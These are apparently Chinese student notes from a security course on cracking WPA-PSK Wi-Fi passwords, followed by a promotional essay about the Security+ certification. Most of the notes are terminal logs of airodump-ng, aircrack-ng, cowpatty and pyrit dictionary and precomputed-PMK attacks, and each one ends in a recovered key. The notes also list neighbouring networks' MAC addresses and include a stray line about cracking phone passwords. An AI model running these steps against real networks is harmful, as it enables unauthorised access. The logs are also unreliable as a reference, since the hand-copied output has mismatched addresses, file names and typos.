HTTP://ETUORLASLS.ORG/NETWORKING/802.11+SECURITY.+WI-FI+PROTECTED+ACCESS+AND+802.11I/
TR破解密码 测试效果 john --wordlist=password.lst --rules --stdout | grep -i Password123 破解调用 john --wordlist=pass.list --rules --stdout | aircrack-ng -e kifi -w wpa.cap 北京联通手机号密码破解 |
COWPATTY破解密码 WPA密码通用破解工具 使用密码字典 cowpatty -r wpa.cap -f password.lst -s kifi 使用彩虹表(PMK) genpmk -f password.lst -d pmkhash -s kifi cowpatty -r wpa.cap -d pmkhash -s kifi |
[email protected]:~# ls
1 dic wpa-01.kisment.csv wpa-02.kisment.netxml wpa-04.cap 下载 模板
2444.sh Play0nLinux‘s virtual drives wpa-01.kisment.netxml wpa-03.cap wpa-04.csv 公共 视频
5814.pl rock wpa-02.cap wpa-03.csv wpa-04.kismet.csv 图片 音乐
?????? wpa-01.cap wpa-02.csv wpa-03.kismet.csv wpa-04.kisment.netm 文档
backbox-4.4-amd64.iso wpa-01.csv wpa-02.kisment.csv wpa-03.kismet.netxml www.csdn.net.sql
[email protected]:~# rm wpa-0*
1 5814.pl backbox-4.4-amd64.iso PlayOnLinux‘s virtual dirves www.csdn.net.sql 公共 文档 模板 音乐
2444.sh ???? dict rock 下载 图片 桌面 视频
[email protected]:~# iwconfig
eth0 no wireless extensions.
at0 no wireless extensions.
wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.462 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
[email protected]:~# airodump-ng wlan0mon
[email protected]:~# airodump-ng wlan0mon --bssid EC:26:CA:DC:29:B6 -c 11 -w wpa
[email protected]:~# aircrack-ng -w /usr/share/john/password.lst wpa-01
wpa-01.cap wpa-01.csv wpa-01.kismet.csv wpa-01.kisment.netxml
[email protected]:~# aircrack-ng -w /usr/share/john/password.lst wpa-01
wpa-01.cap wpa-01.csv wpa-01.kismet.csv wpa-01.kisment.netxml
[email protected]:~# aircrack-ng -w /usr/share/john/password.lst wpa-01.cap
Opening wpa-01.cap
Read 18283 packets.
# BSSID ESSID Encryption
1 EC:26:CA:DC:29:B6 kifi WPA (1 handshake)
Choosing first network as target.
Opening wpa-01.cap
Aircrack-ng 1.2 rc2
[00:00:00] 265 keys tested (300.75 k/s)
KEY FOUND! [ Password ]
Master Key : 35 D2 A8 EA 41 96 A8 60 OE AF 59 8F 5C D9 66 F1
CA 6E B3 8A A0 C0 B5 F7 1B 32 0A 00 E2 38 D2 DC
Transient Key : 77 84 F7 EF 0B AC 16 BD 8A E1 42 C1 F3 44 53 34
AD 08 45 0E E6 EF 17 43 B9 2E 65 DF 62 31 6B 45
CE 5D 92 9B C1 F5 54 E6 E5 1C 93 3F 06 E0 90 90
51 F2 5C 73 EA 6D 6C 0F A6 D2 6D BF 50 08 0E 86
EAPOL HMAC : 4A 39 BA EE A8 83 0D 19 93 E6 8F 7A 60 18 6D 54
[email protected]:~# cowpatty -r wpa-01.cap -f /usr/share/john/password.lst -s kifi
cowpatty 4.6 - WPA-PSK dictionary attack. <[email protected]>
Colleted all necessary data to mount crack against WPA2/PSK passphrase
Starting dictionary attack. Please be patient
The PSK is "Password".
179 passphrases tested in 1.64 seconds: 109.36 passphrases/second
[email protected]:~# genpmk -f /usr/share/john/password.lst -d pmkhash -s kifi
genpmk 1.1 - WPA-PSK precomputation attack.<[email protected]>
File pmkhash does not exist,creating.
[email protected]:~# ls
1 5814.pl backbox-4.4-amd64.iso PlayOnLinux‘s virtual dirves rock wpa-01.csv wpa-01.kismet.netxml 下载 图片 桌面 视频
2444.sh ???? dict pmkhash wpa-01.cap wpa-01.kismet.csv www.csdn.net.sql 公共 文档 模板 音乐
[email protected]:~# cat pmkhash
[email protected]:~# ls
1 PlayOnLinux‘s virtual dirves wpa-01.kismet.netxml 桌面
2444.sh pmkhash www.csdn.net.sql 模板
5814.pl rock 下载 视频
????? wpa-01.cap 公共 音乐
bockbox-4.4-amd64.iso wpa-01.csv 图片
dict wpa-01.kismet.csv 文档
[email protected]:~# cowpatty -r wpa-01.cap -d pmkhash -s kifi
cowpatty 4.6 - WPA-PSK dictionary attack. <[email protected]>
Colleted all necessary data to mount crack against WPA2/PSK passphrase
Starting dictionary attack. Please be patient
The PSK is "Password".
179 passphrases tested in 1.64 seconds: 97494.55 passphrases/second
PYRIT破解密码 与airolib、cowpatty相同,支持基于预计算的PMK提高破解速度 独有的优势 除CPU之外pyrit可以运行GPU的强大运算能力加速生成PMK 本身支持抓包获取四步握手过程,无需用Airdum抓包 也支持传统的读取airodump抓包获取四步握手的方式 只抓取WAP四次握手过程包 pyrit -r wlan2mon -o wpapyrit.cap stripLive pyrit -r wpapyrit.cap analyze 从airodump抓包导入并筛选 pyrit -r wpa.cap -o wpapyrit.cap strip |
[email protected]:~# pyrit -r wlan0mon -o wpapyrit.cap stripLive
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing packets from ‘wlan0mon‘...
1/1: New AccessPonit bc:d1:77:c0:87:de (‘MERCURY_C087DE‘)
2/2: New AccessPonit 14:75:90:21:4f:56 (‘TP-LINK_4F56‘)
3/3: New AccessPonit e0:06:e6:39:c3:0c(‘lizhi2012‘)
3/4: New Station 68:3e:34:30:0f:aa (AP ec:26:ca:dc:29:b6)
4/9: New AccessPonit ec:26:ca:dc:29:b5 (‘kifi‘)
4/21: New Station 80:71:7a:e3:51:c9 (AP 14:74:90:21:4f:56)
4/135: New Station 58:44:98:a3:7a:18 (AP 14:74:90:21:4f:56)
4/324: New Station e8:3e:b6:1b:19:31 (AP 14:74:90:21:4f:56)
4/461: New Station 18:dc:56:f0:26:9f (AP 14:74:90:21:4f:56)
4/646: New Station 90:3c:92:ba:00:cc (AP 14:74:90:21:4f:56)
4/975: New Station e0:06:e6:39:c3:0b (AP 14:74:90:21:4f:56)
4/1957: New Station 54:9f:13:73:02:8d (AP 14:74:90:21:4f:56)
4/2767: New Station 68:3e:34:30:0f:aa (AP 14:74:90:21:4f:56)
4/3286: New Station 6c:71:d9:1c:80:4c (AP 14:74:90:21:4f:56)
5/3858: Challenge AP ec:26:ca:dc:29:b6 <-> STA 68:3e:34:30:0f:aa
6/3859: Response AP ec:26:ca:dc:29:b6 <-> STA 68:3e:34:30:0f:aa
6/3859: New Handshake AP ec:26:ca:dc:29:b6: HMAC_SHA1 AES, bad, spread 1
7/3860: Confirmation AP ec:26:ca:dc:29:b6 <-> STA 68:3e:34:30:0f:aa
7/3960 New Handshake AP ec:26:ca:dc:29:b6: HMAC_SHA1_AES, good, spread 1
8/4065: New AccessPoint bc:14:ef:al:97:29 (‘gehua01141406060486797‘)
^C
Interrupted...
#1: AccessPoint d0:c7:c0:99:ec:3a (‘None‘)
#2: AccessPoint bc:d1:77:c0:87:de (‘‘MERCURY_C087DE‘)
#3: AccessPoint 14:75:90:21:4f:56 (‘TP-LINK_4F56‘)
#4: AccessPoint bc:14:ef:al:97:29 (‘gehua01141406060486797‘)
#5: AccessPoint ec:26:ca:dc:29:b6 (‘kifi‘)
#0: Station 68:3e:34:30:0f:aa, 1 handshake(s)
#1: HMAC_SHA1_AES, good, spread 1
#6: AccessPoint e0:06:e6:39:c3:0c(‘lizhi2012‘)
New pcap-file ‘wpapyrit.cap‘ written (8 out of 6480 packets)
[email protected]:~# pyrit -r wpapyrit.cap analyze
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file ‘wpapyrit.cap‘ (1/1)...
Parsed 8 packets (8 8032.11-packets),got 5 AP(s)
#1: AccessPoint bc:d1:77:c0:87:de (‘‘MERCURY_C087DE‘)
#2: AccessPoint 14:75:90:21:4f:56 (‘TP-LINK_4F56‘)
#3: AccessPoint bc:14:ef:al:97:29 (‘gehua01141406060486797‘)
#4: AccessPoint ec:26:ca:dc:29:b5 (‘kifi‘)
#1: Station 68:3e:34:30:0f:aa, 1 handshake(s)
#1: HMAC_SHA1_AES, good, spread 1
#5: AccessPoint e0:06:e6:39:c3:0c(‘lizhi2012‘)
[email protected]:~# pyrit -r wpa.cap -o wpapyrit.cap strip
wpa-01.cap wpa-01.kismet.csv wpapyirt.cap
wpa-01.csv wpa-02.kismet.netxml
[email protected]:~# pyrit -r wpa-01.cap -o wpapyrit1.cap strip
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file ‘wpapyrit.cap‘ (1/1)...
Parsed 17 packets (17 8032.11-packets),got 1 AP(s)
#1: AccessPoint ec:26:ca:dc:29:b5 (‘kifi‘)
#0: Station 68:3e:34:30:0f:aa, 15 handshake(s)
#1: HMAC_SHA1_AES, good, spread 1
#2: HMAC_SHA1_AES, good, spread 3
#3: HMAC_SHA1_AES, good, spread 11
#4: HMAC_SHA1_AES, good, spread 1
#5: HMAC_SHA1_AES, good, spread 1
#6: HMAC_SHA1_AES, good, spread 1
#7: HMAC_SHA1_AES, good, spread 1
#8: HMAC_SHA1_AES, good, spread 1
#9: HMAC_SHA1_AES, good, spread 1
#10: HMAC_SHA1_AES, good, spread 5
#11: HMAC_SHA1_AES, good, spread 7
#12: HMAC_SHA1_AES, good, spread 7
#13: HMAC_SHA1_AES, good, spread 9
#14: HMAC_SHA1_AES, good, spread 9
#15: HMAC_SHA1_AES, good, spread 13
New pcap-file ‘wapapritl.cap‘ written (16 out of 17 packets)
[email protected]:~# pyrit -r wpapyrit1.cap strip
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file ‘wpapyrit.cap‘ (1/1)...
Parsed 17 packets (17 8032.11-packets),got 1 AP(s)
#1: AccessPoint ec:26:ca:dc:29:b5 (‘kifi‘)
#0: Station 68:3e:34:30:0f:aa, 15 handshake(s)
#1: HMAC_SHA1_AES, good, spread 1
#2: HMAC_SHA1_AES, good, spread 3
#3: HMAC_SHA1_AES, good, spread 11
#4: HMAC_SHA1_AES, good, spread 1
#5: HMAC_SHA1_AES, good, spread 1
#6: HMAC_SHA1_AES, good, spread 1
#7: HMAC_SHA1_AES, good, spread 1
#8: HMAC_SHA1_AES, good, spread 1
#9: HMAC_SHA1_AES, good, spread 1
#10: HMAC_SHA1_AES, good, spread 5
#11: HMAC_SHA1_AES, good, spread 7
#12: HMAC_SHA1_AES, good, spread 7
#13: HMAC_SHA1_AES, good, spread 9
#14: HMAC_SHA1_AES, good, spread 9
#15: HMAC_SHA1_AES, good, spread 13
PYRIT破解密码 使用密码字典直接破解 pyrit -r wpaprit.cap -i password.lst -b <AP MAC> attack passthrough 数据库模式破解 默认使用基于文件的数据库,支持连接SQL数据库,将计算的PMK存入数据库 查看默认数据库状态:pyrit eval 导入密码字典:pyrit -i password.lst import password (剔除了不合规的密码) 制定ESSID:pyrit -e kifi create essid 计算PMK:pyrit batch (发挥GPU计算能力) 破解密码:pyrit -r wpapyrit.cap -b <AP MAC> attack_db |
[email protected]:~# pyrit -r wpaprit.cap -i /usr/share/john/password.lst -b ec:26:ca:dc:29:b6 attack passthrough
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file ‘wpapyrit.cap‘ (1/1)...
Parsed 8 packets (8 8032.11-packets),got 5 AP(s)
Tried 647 PMKs so far; 238 PMKs per second.
The password is ‘Password‘.
[email protected]:~# pyrit eval
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connection to storage at ‘file://‘... connected
Passwords availbale: 0
[email protected]:~# pyrit -i usr/share/john/password.lst import password
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connection to storage at ‘file://‘... connected
3559 lines read flushing buffers.
[email protected]:~# pyrit eval
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connection to storage at ‘file://‘... connected
Passwords availbale: 637
[email protected]:~# pyrit -e kifi create essid
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connection to storage at ‘file://‘... connected
Creates ESSID ‘kifi‘
[email protected]:~# pyrit batch
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connection to storage at ‘file://‘... connected
Creates ESSID ‘kifi‘
Processed all workunits for ESSID ‘kifi‘;179 PMKs per second.nd.
Batchprocessing done.
[email protected]:~# pyrit -r wpapyrit.cap -b ec:26:ca:dc:29:b6 attack_db
Pyrit 0.4.0 (C) 2008-2011 Lujas lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Connection to storage at ‘file://‘... connected
Parsing file ‘wpapyrit1.cap‘ (1/1)...
Parsed 16 packets (16 802.11-packets), got 1 AP(s)
Attacking handshake with Station 68:3e:34:30:0f:aa...
Tried 351 PMKs so far (56.2%); 20714 PMKs per second.
The password is ‘Password‘
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。